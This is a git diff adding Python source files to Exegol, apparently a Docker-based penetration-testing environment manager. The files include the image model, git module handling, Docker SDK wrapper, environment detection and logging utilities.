+ return datetime.strptime(self.__build_date, "%Y-%m-%dT%H:%M:%SZ").strftime("%d/%m/%Y %H:%M") + else: + return self.__build_date + + def isInstall(self) -> bool: + """Installation status getter""" + return self.__is_install + + def isLocal(self) -> bool: + """Local type getter""" + return not self.__is_remote + + def isLocked(self) -> bool: + """Getter locked status. + If current image is locked, it must be removed""" + return self.__outdated + + def isVersionSpecific(self) -> bool: + """Is the current image a version specific version? 
+ Image version specific container a '-' in the name, + latest image don't.""" + return self.__version_specific + + def getName(self) -> str: + """Image's tag name getter""" + return self.__name + + def getDisplayName(self) -> str: + """Image's display name getter""" + return self.__alt_name if self.__alt_name else self.__name + + def getLatestVersionName(self) -> str: + """Image's tag name with latest version getter""" + if self.__version_specific or self.__version_label_mode or 'N/A' in self.__profile_version: + return self.__name + else: + return self.__name + "-" + self.__profile_version + + def getInstalledVersionName(self) -> str: + """Image's tag name with latest version getter""" + if self.__version_specific or self.__version_label_mode or 'N/A' in self.__image_version: + return self.__name + else: + return self.__name + "-" + self.__image_version + + def __setImageVersion(self, version: str, source_tag: bool = True): + """Image's tag version setter. + Set source_tag as true if the information is retrieve from the image's tag name. 
+ If the version is retrieve from the label, set source_tag as False.""" + self.__image_version = version + self.__version_label_mode = not source_tag + + def getImageVersion(self) -> str: + """Image's tag version getter""" + return self.__image_version + + def __setLatestVersion(self, version: str): + """Image's tag version setter""" + self.__profile_version = version + + def getLatestVersion(self) -> str: + """Latest image version getter""" + return self.__profile_version + + def getFullName(self) -> str: + """Dockerhub image's full name getter""" + return f"{ConstantConfig.IMAGE_NAME}:{self.__name}" + + def getFullVersionName(self) -> str: + """Dockerhub image's full (installed) version name getter""" + return f"{ConstantConfig.IMAGE_NAME}:{self.getInstalledVersionName()}" diff --git a/exegol/model/ExegolModules.py b/exegol/model/ExegolModules.py new file mode 100644 index 00000000..2272f5a5 --- /dev/null +++ b/exegol/model/ExegolModules.py @@ -0,0 +1,86 @@ +from pathlib import Path +from typing import Optional, Union + +from exegol.console.ExegolPrompt import Confirm +from exegol.exceptions.ExegolExceptions import CancelOperation +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import logger +from exegol.utils.GitUtils import GitUtils +from exegol.utils.MetaSingleton import MetaSingleton +from exegol.utils.UserConfig import UserConfig + + +class ExegolModules(metaclass=MetaSingleton): + """Singleton class dedicated to the centralized management of the project modules""" + + def __init__(self): + """Init project git modules to None until their first call""" + self.__git_wrapper: Optional[GitUtils] = None + self.__git_source: Optional[GitUtils] = None + self.__git_resources: Optional[GitUtils] = None + + def getWrapperGit(self, fast_load: bool = False) -> GitUtils: + """GitUtils local singleton getter. 
+ Set fast_load to True to disable submodule init/update.""" + if self.__git_wrapper is None: + self.__git_wrapper = GitUtils(skip_submodule_update=fast_load) + return self.__git_wrapper + + def getSourceGit(self, fast_load: bool = False) -> GitUtils: + """GitUtils source submodule singleton getter. + Set fast_load to True to disable submodule init/update.""" + # Be sure that submodules are initialized first + self.getWrapperGit() + if self.__git_source is None: + self.__git_source = GitUtils(ConstantConfig.src_root_path_obj / "exegol-docker-build", "images", + skip_submodule_update=fast_load) + return self.__git_source + + def getResourcesGit(self, fast_load: bool = False, skip_install: bool = False) -> GitUtils: + """GitUtils resource repo/submodule singleton getter. + Set fast_load to True to disable submodule init/update. + Set skip_install to skip the installation process of the modules if not available. + If skip_install is NOT set, the CancelOperation exception is raised if the installation failed.""" + if self.__git_resources is None: + self.__git_resources = GitUtils(UserConfig().exegol_resources_path, "resources", "", + skip_submodule_update=fast_load) + if not self.__git_resources.isAvailable and not skip_install: + self.__init_resources_repo() + return self.__git_resources + + def __init_resources_repo(self): + """Initialization procedure of exegol resources module. + Raise CancelOperation if the initialization failed.""" + if Confirm("Do you want to download exegol resources?
+ (~1G)", True): + # If git wrapper is ready and exegol resources location is the corresponding submodule, running submodule update + # if not, git clone resources + if UserConfig().exegol_resources_path == ConstantConfig.src_root_path_obj / 'exegol-resources' and \ + self.getWrapperGit().isAvailable: + # When resources are loaded from the git submodule, git objects are stored in the root .git directory + self.__warningExcludeFolderAV(ConstantConfig.src_root_path_obj) + if self.getWrapperGit().submoduleSourceUpdate("exegol-resources"): + self.__git_resources = None + self.getResourcesGit() + else: + # Error during install, raise error to avoid update process + raise CancelOperation + else: + self.__warningExcludeFolderAV(UserConfig().exegol_resources_path) + if not self.__git_resources.clone(ConstantConfig.EXEGOL_RESOURCES_REPO): + # Error during install, raise error to avoid update process + raise CancelOperation + else: + # User cancelled the installation, skip the update + raise CancelOperation + + def isExegolResourcesReady(self) -> bool: + """Check if the Exegol-resources module is ready to use (available locally)""" + return self.getResourcesGit(fast_load=True).isAvailable + + @staticmethod + def __warningExcludeFolderAV(directory: Union[str, Path]): + """Generic procedure to warn the user that files incompatible with antivirus software will be downloaded and that + the destination folder should be excluded from the scans to avoid any problems""" + logger.warning(f"If you are using an [orange3][g]Anti-Virus[/g][/orange3] on your host, you should exclude the folder {directory} before starting the download.") + while not Confirm(f"Are you ready to start the download?", True): + pass diff --git a/exegol/model/SelectableInterface.py b/exegol/model/SelectableInterface.py new file mode 100644 index 00000000..c16f1526 --- /dev/null +++ b/exegol/model/SelectableInterface.py @@ -0,0 +1,10 @@ +class SelectableInterface: + """Generic class used to select objects in the user TUI""" + + def getKey(self) -> str: +
"""Universal unique key getter""" + raise NotImplementedError + + def __eq__(self, other): + """Generic '==' operator overriding matching object key""" + return other == self.getKey() diff --git a/exegol/model/__init__.py b/exegol/model/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/utils/ConstantConfig.py b/exegol/utils/ConstantConfig.py new file mode 100644 index 00000000..ba8f1bd6 --- /dev/null +++ b/exegol/utils/ConstantConfig.py @@ -0,0 +1,53 @@ +import site +from pathlib import Path + + +class ConstantConfig: + """Constant parameters information""" + # Exegol Version + version: str = "4.0.0" + + # OS Dir full root path of exegol project + src_root_path_obj: Path = Path(__file__).parent.parent.parent.resolve() + # Path of the Dockerfile + build_context_path_obj: Path + build_context_path: str + # Install mode, check if Exegol has been git cloned or installed using pip package + git_source_installation: bool = (src_root_path_obj / '.git').is_dir() + pip_installed: bool = src_root_path_obj.parent.name == "site-packages" + # Dockerhub Exegol images repository + DOCKER_REGISTRY: str = "hub.docker.com" # Don't handle docker login operations + IMAGE_NAME: str = "nwodtuhs/exegol" + # Docker volume names (no docker volume used at this moment) + # Resources repository + EXEGOL_RESOURCES_REPO: str = "https://github.com/ShutdownRepo/Exegol-resources.git" + + @classmethod + def findBuildContextPath(cls) -> Path: + """Find the right path to the build context from Exegol docker images. 
+ Support source clone installation and pip package (venv / user / global context)""" + dockerbuild_folder_name = "exegol-docker-build" + local_src = cls.src_root_path_obj / dockerbuild_folder_name + if local_src.is_dir(): + # If exegol is clone from github, build context is accessible from root src + return local_src + else: + # If install from pip + if site.ENABLE_USER_SITE: + # Detect a user based python env + possible_locations = [Path(site.getuserbase())] + # Detect a global installed package + for loc in site.getsitepackages(): + possible_locations.append(Path(loc).parent.parent.parent) + # Find a good match + for test in possible_locations: + context_path = test / dockerbuild_folder_name + if context_path.is_dir(): + return context_path + # Detect a venv context + return Path(site.PREFIXES[0]) / dockerbuild_folder_name + + +# Dynamically built attribute must be set after class initialization +ConstantConfig.build_context_path_obj = ConstantConfig.findBuildContextPath() +ConstantConfig.build_context_path = str(ConstantConfig.build_context_path_obj) diff --git a/exegol/utils/DockerUtils.py b/exegol/utils/DockerUtils.py new file mode 100644 index 00000000..1e7c7077 --- /dev/null +++ b/exegol/utils/DockerUtils.py @@ -0,0 +1,452 @@ +import json +import os +from datetime import datetime +from typing import List, Optional, Union + +import docker +import requests +from docker import DockerClient +from docker.errors import APIError, DockerException, NotFound, ImageNotFound +from docker.models.images import Image +from docker.models.volumes import Volume +from requests import ReadTimeout + +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.exceptions.ExegolExceptions import ObjectNotFound +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from 
exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, console + + +# SDK Documentation : https://docker-py.readthedocs.io/en/stable/index.html + +class DockerUtils: + """Utility class between exegol and the Docker SDK""" + try: + # Connect Docker SDK to the local docker instance. + # Docker connection setting is loaded from the user environment variables. + __client: DockerClient = docker.from_env() + # Check if the docker daemon is serving linux container + __daemon_info = __client.info() + if __daemon_info.get("OSType", "linux").lower() != "linux": + logger.critical( + f"Docker daemon is not serving linux container ! Docker OS Type is: {__daemon_info.get('OSType', 'linux')}") + EnvInfo.initData(__daemon_info) + except DockerException as err: + if 'ConnectionRefusedError' in str(err): + logger.critical("Unable to connect to docker (from env config). Is docker running on your machine? " + "Exiting.") + elif 'FileNotFoundError' in str(err): + logger.critical("Unable to connect to docker. Is docker installed on your machine? " + "Exiting.") + else: + logger.error(err) + logger.critical( + "Unable to connect to docker (from env config). Is docker operational and accessible? on your machine? " + "Exiting.") + __images: Optional[List[ExegolImage]] = None + __containers: Optional[List[ExegolContainer]] = None + + @classmethod + def clearCache(cls): + """Remove class's images and containers data cache + Only needed if the list has to be updated in the same runtime at a later moment""" + cls.__containers = None + cls.__images = None + + @classmethod + def getDockerInfo(cls) -> dict: + """Fetch info from docker daemon""" + return cls.__daemon_info + + # # # Container Section # # # + + @classmethod + def listContainers(cls) -> List[ExegolContainer]: + """List available docker containers. 
+ Return a list of ExegolContainer""" + if cls.__containers is None: + cls.__containers = [] + try: + docker_containers = cls.__client.containers.list(all=True, filters={"name": "exegol-"}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + for container in docker_containers: + cls.__containers.append(ExegolContainer(container)) + return cls.__containers + + @classmethod + def createContainer(cls, model: ExegolContainerTemplate, temporary: bool = False, + command: str = None) -> ExegolContainer: + """Create an Exegol container from an ExegolContainerTemplate configuration. + Return an ExegolContainer if the creation was successful.""" + logger.info("Creating new exegol container") + model.prepare() + if command is not None: + # Overwriting container starting command, shouldn't be used, prefer using config.setContainerCommand() + model.config.setContainerCommand(command) + logger.debug(model) + # Preload docker volume before container creation + for volume in model.config.getVolumes(): + if volume.get('Type', '?') == "volume": + docker_volume = cls.__loadDockerVolume(volume_path=volume['Source'], volume_name=volume['Target']) + if docker_volume is None: + logger.warning(f"Error while creating docker volume '{volume['Target']}'") + try: + container = cls.__client.containers.run(model.image.getFullName(), + command=model.config.getContainerCommand(), + detach=True, + name=model.hostname, + hostname=model.hostname, + devices=model.config.getDevices(), + environment=model.config.getEnvs(), + network_mode=model.config.getNetworkMode(), + ports=model.config.getPorts(), + privileged=model.config.getPrivileged(), + cap_add=model.config.getCapabilities(), + sysctls=model.config.getSysctls(), + shm_size=model.config.shm_size, + stdin_open=model.config.interactive, + tty=model.config.tty, + mounts=model.config.getVolumes(), + remove=temporary, + auto_remove=temporary, + 
working_dir=model.config.getWorkingDir()) + except APIError as err: + logger.error(err.explanation.decode('utf-8') if type(err.explanation) is bytes else err.explanation) + logger.debug(err) + logger.critical("Error while creating exegol container. Exiting.") + # Not reachable, critical logging will exit + return # type: ignore + if container is not None: + logger.success("Exegol container successfully created !") + else: + logger.critical("Unknown error while creating exegol container. Exiting.") + # Not reachable, critical logging will exit + return # type: ignore + return ExegolContainer(container, model) + + @classmethod + def getContainer(cls, tag: str) -> ExegolContainer: + """Get an ExegolContainer from tag name.""" + try: + # Fetch potential container match from DockerSDK + container = cls.__client.containers.list(all=True, filters={"name": f"exegol-{tag}"}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + # Check if there is at least 1 result. If no container was found, raise ObjectNotFound. + if container is None or len(container) == 0: + raise ObjectNotFound + # Filter results with exact name matching + for c in container: + if c.name == f"exegol-{tag}": + # When the right container is found, select it and stop the search + return ExegolContainer(c) + # When there is some close container's name, + # docker may return some results but none of them correspond to the request. 
+ # In this case, ObjectNotFound is raised + raise ObjectNotFound + + # # # Volumes Section # # # + + @classmethod + def __loadDockerVolume(cls, volume_path: str, volume_name: str) -> Volume: + """Load or create a docker volume for exegol containers + (must be created before the container, SDK limitation) + Return the docker volume object""" + try: + os.makedirs(volume_path, exist_ok=True) + except PermissionError: + logger.error("Unable to create the volume folder on the filesystem locally.") + logger.critical(f"Insufficient permission to create the folder: {volume_path}") + try: + # Check if volume already exist + volume = cls.__client.volumes.get(volume_name) + path = volume.attrs.get('Options', {}).get('device', '') + if path != volume_path: + try: + cls.__client.api.remove_volume(name=volume_name) + raise NotFound('Volume must be reloaded') + except APIError as e: + if e.status_code == 409: + logger.warning("The path of the volume specified by the user is not the same as in the existing docker volume. 
" + "The user path will be [red]ignored[/red] as long as the docker volume already exists.") + logger.verbose("The volume is already used by some container and cannot be automatically removed.") + logger.debug(e.explanation) + else: + raise NotFound('Volume must be reloaded') + except NotFound: + try: + # Creating a docker volume bind to a host path + # Docker volume are more easily shared by container + # Docker volume can load data from container image on host's folder creation + volume = cls.__client.volumes.create(volume_name, driver="local", + driver_opts={'o': 'bind', + 'device': volume_path, + 'type': 'none'}) + except APIError as err: + logger.error(f"Error while creating docker volume '{volume_name}'.") + logger.debug(err) + logger.critical(err.explanation) + return None # type: ignore + except APIError as err: + logger.critical(f"Unexpected error by Docker SDK : {err}") + return None # type: ignore + return volume + + # # # Image Section # # # + + @classmethod + def listImages(cls, include_version_tag: bool = False) -> List[ExegolImage]: + """List available docker images. + Return a list of ExegolImage""" + if cls.__images is None: + remote_images = cls.__listRemoteImages() + local_images = cls.__listLocalImages() + images = ExegolImage.mergeImages(remote_images, local_images) + cls.__images = ExegolImage.reorderImages(images) + if not include_version_tag: + return [img for img in cls.__images if not img.isVersionSpecific() or img.isInstall()] + return cls.__images + + @classmethod + def listInstalledImages(cls) -> List[ExegolImage]: + """List installed docker images. 
+ Return a list of ExegolImage""" + images = cls.listImages() + # Selecting only installed image + return [img for img in images if img.isInstall()] + + @classmethod + def getImage(cls, tag: str) -> ExegolImage: + """Get an ExegolImage from tag name.""" + # Fetch every images available + images = cls.listImages() + # Find a match + for i in images: + if i.getName() == tag: + return i + raise ObjectNotFound + + @classmethod + def getInstalledImage(cls, tag: str) -> ExegolImage: + """Get an already installed ExegolImage from tag name.""" + try: + if cls.__images is None: + try: + docker_local_image = cls.__client.images.get(f"{ConstantConfig.IMAGE_NAME}:{tag}") + # DockerSDK image get is an exact matching, no need to add more check + return ExegolImage(docker_image=docker_local_image) + except APIError as err: + if err.status_code == 404: + raise ObjectNotFound + else: + logger.critical(f"Error on image loading: {err}") + else: + for img in cls.__images: + if img.getName() == tag: + if not img.isInstall() or not img.isUpToDate(): + # Refresh local image status in case of installation/upgrade operations + cls.__findImageMatch(img) + return img + except ObjectNotFound: + logger.critical(f"The desired image has not been found ({ConstantConfig.IMAGE_NAME}:{tag}). Exiting") + return # type: ignore + + @classmethod + def __listLocalImages(cls, tag: Optional[str] = None) -> List[Image]: + """List local docker images already installed. 
+ Return a list of docker images objects""" + logger.debug("Fetching local image tags, digests (and other attributes)") + try: + image_name = ConstantConfig.IMAGE_NAME + ("" if tag is None else f":{tag}") + images = cls.__client.images.list(image_name, filters={"dangling": False}) + except APIError as err: + logger.debug(err) + logger.critical(err.explanation) + # Not reachable, critical logging will exit + return # type: ignore + # Filter out image non-related to the right repository + result = [] + for img in images: + # len tags = 0 handle exegol images (nightly image lost their tag after update) + if len(img.attrs.get('RepoTags', [])) == 0 or \ + ConstantConfig.IMAGE_NAME in [repo_tag.split(':')[0] for repo_tag in img.attrs.get("RepoTags", [])]: + result.append(img) + return result + + @classmethod + def __listRemoteImages(cls) -> List[ExegolImage]: + """List remote dockerhub images available. + Return a list of ExegolImage""" + logger.debug("Fetching remote image tags, digests and sizes") + remote_results = [] + url: Optional[str] = f"https://{ConstantConfig.DOCKER_REGISTRY}/v2/repositories/{ConstantConfig.IMAGE_NAME}/tags" + # Handle multi-page tags from registry + with console.status(f"Loading information", spinner_style="blue") as s: + while url is not None: + remote_images_request = None + logger.debug(f"Fetching information from: {url}") + s.update(status=f"Fetching information from [green]{url}[/green]") + try: + remote_images_request = requests.get( + url=url, + timeout=(5, 10), verify=ParametersManager().verify) + except requests.exceptions.HTTPError as e: + logger.error(f"Response error: {e.response.text}") + except requests.exceptions.ConnectionError as err: + logger.error(f"Error: {err}") + logger.error("Connection Error: you probably have no internet.") + except requests.exceptions.ReadTimeout: + logger.error( + "[green]Dockerhub[/green] request has [red]timed out[/red]. Do you have a slow internet connection, or is the remote service slow/down? 
Retry later.") + except requests.exceptions.RequestException as err: + logger.error(f"Unknown connection error: {err}") + if remote_images_request is None: + logger.warning("Skipping online queries.") + return [] + docker_repo_response = json.loads(remote_images_request.text) + for docker_image in docker_repo_response["results"]: + exegol_image = ExegolImage(name=docker_image.get('name', 'NONAME'), + digest=docker_image["images"][0]["digest"], + size=docker_image.get("full_size")) + remote_results.append(exegol_image) + url = docker_repo_response.get("next") # handle multiple page tags + # Remove duplication (version specific / latest release) + return remote_results + + @classmethod + def __findImageMatch(cls, remote_image: ExegolImage): + """From a Remote ExegolImage, try to find a local match (using Remote DigestID). + This method is useful if the image repository name is also lost""" + try: + docker_image = cls.__client.images.get(f"{ConstantConfig.IMAGE_NAME}@{remote_image.getRemoteId()}") + except ImageNotFound: + raise ObjectNotFound + remote_image.setDockerObject(docker_image) + + @classmethod + def downloadImage(cls, image: ExegolImage, install_mode: bool = False) -> bool: + """Download/pull an ExegolImage""" + # Switch to install mode if the selected image is not already installed + install_mode = install_mode or not image.isInstall() + logger.info(f"{'Installing' if install_mode else 'Updating'} exegol image : {image.getName()}") + name = image.updateCheck() + if name is not None: + logger.info(f"Starting download. 
Please wait, this might be (very) long.") + try: + ExegolTUI.downloadDockerLayer( + cls.__client.api.pull(repository=ConstantConfig.IMAGE_NAME, + tag=name, + stream=True, + decode=True)) + logger.success(f"Image successfully updated") + # Remove old image + if not install_mode and image.isInstall(): + cls.removeImage(image, upgrade_mode=not install_mode) + return True + except APIError as err: + if err.status_code == 500: + logger.error(f"Error: {err.explanation}") + logger.error(f"Error while contacting docker registry. Aborting.") + elif err.status_code == 404: + logger.critical(f"The image has not been found on the docker registry: {err.explanation}") + else: + logger.debug(f"Error: {err}") + logger.critical(f"An error occurred while downloading this image: {err.explanation}") + return False + + @classmethod + def downloadVersionTag(cls, image: ExegolImage) -> Union[ExegolImage, str]: + """Pull a docker image for a specific version tag and return the corresponding ExegolImage""" + try: + image = cls.__client.images.pull(repository=ConstantConfig.IMAGE_NAME, + tag=image.getLatestVersionName()) + return ExegolImage(docker_image=image, isUpToDate=True) + except APIError as err: + if err.status_code == 500: + return f"error while contacting docker registry: {err.explanation}" + elif err.status_code == 404: + return f"matching tag doesn't exist: {err.explanation}" + else: + logger.debug(f"Error: {err}") + return f"en unknown error occurred while downloading this image : {err.explanation}" + + @classmethod + def removeImage(cls, image: ExegolImage, upgrade_mode: bool = False) -> bool: + """Remove an ExegolImage from disk""" + logger.verbose(f"Removing {'previous ' if upgrade_mode else ''}image '{image.getName()}' ...") + tag = image.removeCheck() + if tag is None: # Skip removal if image is not installed locally. 
+ return False + try: + if not image.isVersionSpecific() and image.getInstalledVersionName() != image.getName(): + # Docker can't remove multiple images at the same tag, version specific tag must be remove first + logger.debug(f"Remove image {image.getFullVersionName()}") + cls.__client.images.remove(image.getFullVersionName(), force=False, noprune=False) + logger.debug(f"Remove image {image.getLocalId()} ({image.getFullName()})") + with console.status(f"Removing {'previous ' if upgrade_mode else ''}image '{image.getName()}' ...", spinner_style="blue"): + cls.__client.images.remove(image.getLocalId(), force=False, noprune=False) + logger.success(f"{'Previous d' if upgrade_mode else 'D'}ocker image successfully removed.") + return True + except APIError as err: + # Handle docker API error code + logger.verbose(err.explanation) + if err.status_code == 409: + if upgrade_mode: + logger.error(f"The '{image.getName()}' image cannot be deleted yet, " + "all containers using this old image must be deleted first.") + else: + logger.error("This image cannot be deleted because it is currently used by a container. Aborting.") + elif err.status_code == 404: + logger.error("This image doesn't exist locally. Aborting.") + else: + logger.critical(f"An error occurred while removing this image : {err}") + except ReadTimeout: + logger.error("The deletion of the image has timeout, the deletion may be incomplete.") + return False + + @classmethod + def buildImage(cls, tag: str, build_profile: Optional[str] = None, build_dockerfile: Optional[str] = None): + """Build a docker image from source""" + logger.info(f"Building exegol image : {tag}") + if build_profile is None or build_dockerfile is None: + build_profile = "full" + build_dockerfile = "Dockerfile" + logger.info("Starting build. 
Please wait, this might be [bold](very)[/bold] long.") + logger.verbose(f"Creating build context from [gold]{ConstantConfig.build_context_path}[/gold] with " + f"[green][b]{build_profile}[/b][/green] profile.") + try: + # path is the directory full path where Dockerfile is. + # tag is the name of the final build + # dockerfile is the Dockerfile filename + ExegolTUI.buildDockerImage( + cls.__client.api.build(path=ConstantConfig.build_context_path, + dockerfile=build_dockerfile, + tag=f"{ConstantConfig.IMAGE_NAME}:{tag}", + buildargs={"TAG": f"{build_profile}", + "VERSION": "local", + "BUILD_DATE": datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')}, + rm=True, + forcerm=True, + pull=True, + decode=True)) + logger.success(f"Exegol image successfully built") + except APIError as err: + logger.debug(f"Error: {err}") + if err.status_code == 500: + logger.error(f"Error: {err.explanation}") + logger.error("Error while contacting docker hub. You probably don't have internet. Aborting.") + logger.debug(f"Error: {err}") + else: + logger.critical(f"An error occurred while building this image : {err}") diff --git a/exegol/utils/EnvInfo.py b/exegol/utils/EnvInfo.py new file mode 100644 index 00000000..3ced4329 --- /dev/null +++ b/exegol/utils/EnvInfo.py @@ -0,0 +1,78 @@ +import platform +import re +import subprocess +from typing import Optional + + +class EnvInfo: + """Contain information about the environment (host, OS, platform, etc)""" + # Shell env + current_platform: str = "WSL" if "microsoft" in platform.release() else platform.system() # Can be 'Windows', 'Linux' or 'WSL' + is_linux_shell: bool = current_platform in ["WSL", "Linux"] # TODO test mac platform + is_windows_shell: bool = current_platform == "Windows" + __windows_release: Optional[str] = None + # Host OS + __docker_host_os: Optional[str] = None + __docker_engine: Optional[str] = None + + @classmethod + def initData(cls, docker_info): + """Initialize information from Docker daemon data""" + # Fetch data from 
Docker daemon + docker_os = docker_info.get("OperatingSystem", "unknown").lower() + docker_kernel = docker_info.get("KernelVersion", "unknown").lower() + # Deduct a Windows Host from data + is_host_windows = docker_os == "docker desktop" and "microsoft" in docker_kernel # TODO handle mac docker-desktop + cls.__docker_host_os = "Windows" if is_host_windows else "Unix" + if is_host_windows: + # Check docker engine with Windows host + is_wsl2 = "wsl2" in docker_kernel + cls.__docker_engine = "wsl2" if is_wsl2 else "hyper-v" + else: + cls.__docker_engine = "Kernel" + pass + + @classmethod + def getHostOs(cls) -> str: + """Return Host OS + Can be 'Windows' or 'Unix'""" + # initData must be called from DockerUtils on client initialisation + assert cls.__docker_host_os is not None + return cls.__docker_host_os + + @classmethod + def getWindowsRelease(cls) -> str: + # Cache check + if cls.__windows_release is None: + if cls.is_windows_shell: + # From a Windows shell, python supply an approximate (close enough) version of windows + cls.__windows_release = platform.win32_ver()[1] + elif cls.current_platform == "WSL": + # From a WSL shell, we must create a process to retrieve the host's version + # Find version using MS-DOS command 'ver' + proc = subprocess.Popen(["cmd.exe", "/c", "ver"], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL) + proc.wait() + assert proc.stdout is not None + # Try to match Windows version + matches = re.search(r"version (\d+\.\d+\.\d+)(\.\d*)?", proc.stdout.read().decode('utf-8')) + if matches: + # Select match 1 and apply to the attribute + cls.__windows_release = matches.group(1) + else: + # If there is any match, fallback to empty + cls.__windows_release = "" + else: + cls.__windows_release = "" + return cls.__windows_release + + @classmethod + def isWindowsHost(cls) -> bool: + return cls.getHostOs() == "Windows" + + @classmethod + def getDockerEngine(cls) -> str: + """Return Docker engine type. 
+ Can be 'Kernel', 'wsl2' or 'hyper-v'""" + # initData must be called from DockerUtils on client initialisation + assert cls.__docker_engine is not None + return cls.__docker_engine diff --git a/exegol/utils/ExeLog.py b/exegol/utils/ExeLog.py new file mode 100644 index 00000000..89d69242 --- /dev/null +++ b/exegol/utils/ExeLog.py @@ -0,0 +1,118 @@ +import logging +import os +from typing import Any, cast + +from rich.console import Console +from rich.logging import RichHandler + + +# Customized logging class +class ExeLog(logging.Logger): + """Project's Logger custom class""" + # New logging level + SUCCESS: int = 25 + VERBOSE: int = 15 + ADVANCED: int = 13 + + @staticmethod + def setVerbosity(verbose: int, quiet: bool = False): + """Set logging level accordingly to the verbose count or with quiet enable.""" + if quiet: + logger.setLevel(logging.CRITICAL) + elif verbose == 1: + logger.setLevel(ExeLog.VERBOSE) + elif verbose == 2: + logger.setLevel(ExeLog.ADVANCED) + elif verbose >= 3: + logger.setLevel(logging.DEBUG) + else: + # Default INFO + logger.setLevel(logging.INFO) + + def debug(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default debug text format with rich color support""" + super(ExeLog, self).debug("{}[D]{} {}".format("[bold yellow3]", "[/bold yellow3]", msg), *args, **kwargs) + + def advanced(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add advanced logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.ADVANCED): + self._log(ExeLog.ADVANCED, + "{}[A]{} {}".format("[bold yellow3]", "[/bold yellow3]", msg), args, **kwargs) + + def verbose(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add verbose logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.VERBOSE): + self._log(ExeLog.VERBOSE, + "{}[V]{} {}".format("[bold blue]", "[/bold blue]", msg), args, **kwargs) + + def raw(self, msg: Any, level=VERBOSE, markup=False, highlight=False, emoji=False, 
rich_parsing=False) -> None: + """Add raw text logging, used for stream printing.""" + if rich_parsing: + markup = True + highlight = True + emoji = True + if self.isEnabledFor(level): + if type(msg) is bytes: + msg = msg.decode('utf-8', errors="ignore") + # Raw message are print directly to the console bypassing logging system and auto formatting + console.print(msg, end='', markup=markup, highlight=highlight, emoji=emoji) + + def info(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default info text format with rich color support""" + super(ExeLog, self).info("{}[*]{} {}".format("[bold blue]", "[/bold blue]", msg), *args, **kwargs) + + def warning(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default warning text format with rich color support""" + super(ExeLog, self).warning("{}[!]{} {}".format("[bold orange3]", "[/bold orange3]", msg), *args, **kwargs) + + def error(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default error text format with rich color support""" + super(ExeLog, self).error("{}[-]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + + def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default exception text format with rich color support""" + super(ExeLog, self).exception("{}[x]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + + def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Change default critical text format with rich color support + Add auto exit.""" + super(ExeLog, self).critical("{}[!]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) + exit(1) + + def success(self, msg: Any, *args: Any, **kwargs: Any) -> None: + """Add success logging method with text format / rich color support""" + if self.isEnabledFor(ExeLog.SUCCESS): + self._log(ExeLog.SUCCESS, + "{}[+]{} {}".format("[bold green]", "[/bold green]", msg), args, **kwargs) + + def empty_line(self) -> None: + """Print an empty line.""" + 
self.raw(os.linesep, level=logging.INFO) + + +# Global rich console object +console: Console = Console() + +# Main logging default config +# Set default Logger class as ExeLog +logging.setLoggerClass(ExeLog) + +# Add new level to the logging config +logging.addLevelName(ExeLog.VERBOSE, "VERBOSE") +logging.addLevelName(ExeLog.SUCCESS, "SUCCESS") +logging.addLevelName(ExeLog.ADVANCED, "ADVANCED") +# Logging setup using RichHandler and minimalist text format +logging.basicConfig( + format="%(message)s", + handlers=[RichHandler(rich_tracebacks=True, + show_time=False, + markup=True, + show_level=False, + show_path=False, + console=console)] +) + +# Global logger object +logger: ExeLog = cast(ExeLog, logging.getLogger("main")) +# Default log level +logger.setLevel(logging.INFO) diff --git a/exegol/utils/FsUtils.py b/exegol/utils/FsUtils.py new file mode 100644 index 00000000..5be1a46c --- /dev/null +++ b/exegol/utils/FsUtils.py @@ -0,0 +1,50 @@ +import re +import subprocess +from pathlib import Path, PurePosixPath, PurePath +from typing import Optional + +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger + + +def parseDockerVolumePath(source: str) -> PurePath: + """Parse docker volume path to find the corresponding host path.""" + # Check if path is from Windows Docker Desktop + matches = re.match(r"^/run/desktop/mnt/host/([a-z])(/.*)$", source, re.IGNORECASE) + if matches: + # Convert Windows Docker-VM style volume path to local OS path + src_path = Path(f"{matches.group(1).upper()}:{matches.group(2)}") + logger.debug(f"Windows style detected : {src_path}") + return src_path + else: + # Remove docker mount path if exist + return PurePosixPath(source.replace('/run/desktop/mnt/host', '')) + + +def resolvPath(path: Path) -> str: + """Resolv a filesystem path depending on the environment. 
def resolvStrPath(path: Optional[str]) -> str:
    """Best-effort filesystem path resolution from an optional string.

    Returns an empty string for None, otherwise delegates to resolvPath."""
    return '' if path is None else resolvPath(Path(path))
